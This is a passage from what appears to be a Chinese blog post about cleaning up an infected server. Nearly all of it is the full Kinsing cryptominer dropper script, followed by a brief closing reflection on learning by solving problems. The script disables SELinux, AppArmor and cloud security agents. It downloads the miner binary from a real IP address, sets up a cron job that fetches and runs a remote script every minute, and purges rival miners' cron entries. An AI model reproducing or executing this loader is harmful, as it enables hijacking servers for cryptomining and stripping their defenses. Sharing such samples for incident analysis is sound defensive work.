-a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %setenforce 0echo SELINUX=disabled >/etc/selinux/configservice apparmor stopsystemctl disable apparmorservice aliyun.service stopsystemctl disable aliyun.serviceps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %rm -rf /usr/local/aegis

BIN_MD5="2c44b4e4706b8bd95d1866d7867efa0e"BIN_DOWNLOAD_URL="http://178.20.40.200/kinsing"BIN_DOWNLOAD_URL2="http://178.20.40.200/kinsing"BIN_NAME="kinsing"
ROOTUID="0"BIN_PATH="/etc"if [ "$(id -u)" -ne "$ROOTUID" ] ; then  BIN_PATH="/tmp"  if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then    echo "$BIN_PATH not exists or not writeable"    mkdir /tmp  fi  if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then    echo "$BIN_PATH replacing with /var/tmp"    BIN_PATH="/var/tmp"  fi  if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then    TMP_DIR=$(mktemp -d)    echo "$BIN_PATH replacing with $TMP_DIR"    BIN_PATH="$TMP_DIR"  fi  if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then    echo "$BIN_PATH replacing with /dev/shm"    BIN_PATH="/dev/shm"  fi  if [ -d "$BIN_PATH/$BIN_NAME" ]; then    echo "$BIN_PATH/$BIN_NAME is directory"    rm -rf $BIN_PATH/$BIN_NAME  fi  if [ -e "$BIN_PATH/$BIN_NAME" ]; then    echo "$BIN_PATH/$BIN_NAME exists"    if [ ! -w "$BIN_PATH/$BIN_NAME" ]; then      echo "$BIN_PATH/$BIN_NAME not writeable"      ls -la $BIN_PATH | grep -e "/dev" | grep -v grep      if [ $? -eq 0 ]; then        rm -rf $BIN_PATH/$BIN_NAME        rm -rf $BIN_PATH/kdevtmpfsi        echo "found /dev"      else        echo "not found /dev"      fi      TMP_BIN_NAME=$(head -3 /dev/urandom | tr -cd '[:alnum:]' | cut -c -8)      BIN_NAME="kinsing_$TMP_BIN_NAME"    else      echo "writeable $BIN_PATH/$BIN_NAME"    fi  fifi
BIN_FULL_PATH="$BIN_PATH/$BIN_NAME"echo "$BIN_FULL_PATH"
LDR="wget -q -O -"if [ -s /usr/bin/curl ]; then  LDR="curl"fiif [ -s /usr/bin/wget ]; then  LDR="wget -q -O -"fi
if [ -x "$(command -v curl)" ]; then  WGET="curl -o"elif [ -x "$(command -v wget)" ]; then  WGET="wget -O"else  echo "wget none"fiecho "wget is $WGET"
ls -la $BIN_PATH | grep -e "/dev" | grep -v grepif [ $? -eq 0 ]; then  rm -rf $BIN_FULL_PATH  rm -rf $SO_FULL_PATH  rm -rf $BIN_PATH/kdevtmpfsi  rm -rf $BIN_PATH/libsystem.so  rm -rf /tmp/kdevtmpfsi  echo "found /dev"else  echo "not found /dev"fi
checkExists() {  CHECK_PATH=$1  MD5=$2  sum=$(md5sum $CHECK_PATH | awk '{ print $1 }')  retval=""  if [ "$MD5" = "$sum" ]; then    echo >&2 "$CHECK_PATH is $MD5"    retval="true"  else    echo >&2 "$CHECK_PATH is not $MD5, actual $sum"    retval="false"  fi  echo "$retval"}
download() {  DOWNLOAD_PATH=$1  DOWNLOAD_URL=$2  if [ -L $DOWNLOAD_PATH ]  then    rm -rf $DOWNLOAD_PATH  fi  chmod 777 $DOWNLOAD_PATH  $WGET $DOWNLOAD_PATH $DOWNLOAD_URL  chmod +x $DOWNLOAD_PATH}
binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")if [ "$binExists" = "true" ]; then  echo "$BIN_FULL_PATH exists and checked"else  echo "$BIN_FULL_PATH not exists"  download $BIN_FULL_PATH $BIN_DOWNLOAD_URL  binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")  if [ "$binExists" = "true" ]; then    echo "$BIN_FULL_PATH after download exists and checked"  else    echo "$BIN_FULL_PATH after download not exists"    download $BIN_FULL_PATH $BIN_DOWNLOAD_URL2    binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")    if [ "$binExists" = "true" ]; then      echo "$BIN_FULL_PATH after download2 exists and checked"    else      echo "$BIN_FULL_PATH after download2 not exists"    fi  fifi
chmod 777 $BIN_FULL_PATHchmod +x $BIN_FULL_PATHSKL=scg $BIN_FULL_PATH
crontab -l | sed '/#wget/d' | crontab -crontab -l | sed '/#curl/d' | crontab -crontab -l | grep -e "91.241.19.134" | grep -v grepif [ $? -eq 0 ]; then  echo "cron good"else  (    crontab -l 2>/dev/null    echo "* * * * * $LDR http://91.241.19.134/scg.sh | sh > /dev/null 2>&1"  ) | crontab -fi
crontab -l | sed '/base64/d' | crontab -crontab -l | sed '/update.sh/d' | crontab -crontab -l | sed '/logo4/d' | crontab -crontab -l | sed '/logo9/d' | crontab -crontab -l | sed '/logo0/d' | crontab -crontab -l | sed '/logo/d' | crontab -crontab -l | sed '/tor2web/d' | crontab -crontab -l | sed '/jpg/d' | crontab -crontab -l | sed '/png/d' | crontab -crontab -l | sed '/tmp/d' | crontab -crontab -l | sed '/zmreplchkr/d' | crontab -crontab -l | sed '/aliyun.one/d' | crontab -crontab -l | sed '/3.215.110.66.one/d' | crontab -crontab -l | sed '/pastebin/d' | crontab -crontab -l | sed '/onion/d' | crontab -crontab -l | sed '/lsd.systemten.org/d' | crontab -crontab -l | sed '/shuf/d' | crontab -crontab -l | sed '/ash/d' | crontab -crontab -l | sed '/mr.sh/d' | crontab -crontab -l | sed '/185.181.10.234/d' | crontab -crontab -l | sed '/localhost.xyz/d' | crontab -crontab -l | sed '/45.137.151.106/d' | crontab -crontab -l | sed '/111.90.159.106/d' | crontab -crontab -l | sed '/github/d' | crontab -crontab -l | sed '/bigd1ck.com/d' | crontab -crontab -l | sed '/xmr.ipzse.com/d' | crontab -crontab -l | sed '/185.181.10.234/d' | crontab -crontab -l | sed '/146.71.79.230/d' | crontab -crontab -l | sed '/122.51.164.83/d' | crontab -crontab -l | sed '/185.191.32.198/d' | crontab -crontab -l | sed '/newdat.sh/d' | crontab -crontab -l | sed '/lib.pygensim.com/d' | crontab -crontab -l | sed '/t.amynx.com/d' | crontab -crontab -l | sed '/update.sh/d' | crontab -crontab -l | sed '/systemd-service.sh/d' | crontab -crontab -l | sed '/pg_stat.sh/d' | crontab -crontab -l | sed '/sleep/d' | crontab -crontab -l | sed '/oka/d' | crontab -crontab -l | sed '/linux1213/d' | crontab -crontab -l | sed '/zsvc/d' | crontab -crontab -l | sed '/_cron/d' | crontab -crontab -l | sed '/31.210.20.181/d' | crontab -crontab -l | sed '/givemexyz/d' | crontab -crontab -l | sed '/world/d' | crontab -crontab -l | sed '/1.sh/d' | crontab -crontab -l | sed '/3.sh/d' | crontab -crontab -l | sed '/workers/d' | crontab -crontab -l | sed '/oracleservice/d' | crontab -





6.总结


通过这种问题式驱动学习是比较好的,遇到问题然后带着问题去寻找答案,求知探索,知行合一,是一种奇妙无穷的体验和一种悠然而生的成就感,虽然过程很难很煎熬很很头疼,但是当你解决的那一刻的时候是一种喜悦、快乐、高兴和悠然而生的成就感,这种方式得到的答案往往比较记忆犹新,复盘总结一下也会有不少的收获,希望我的分享也能给更多的小伙伴带来帮助,不至于遇到这种奇葩问题二焦头烂额,阅读关注点赞加关注,一键三连哦。